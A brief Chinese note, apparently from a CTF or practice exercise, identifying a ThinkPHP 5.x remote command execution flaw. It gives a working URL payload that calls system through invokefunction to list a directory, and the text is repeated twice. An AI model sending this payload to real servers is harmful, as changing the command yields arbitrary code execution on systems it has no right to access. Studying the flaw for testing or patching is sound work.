是远程命令执行 thinkphp5 rec漏洞
具体执行语句可参考大佬的博客
ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园
其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行
首先试试列出当前目录
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
是远程命令执行 thinkphp5 rec漏洞
具体执行语句可参考大佬的博客
ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园
其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行
首先试试列出当前目录
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls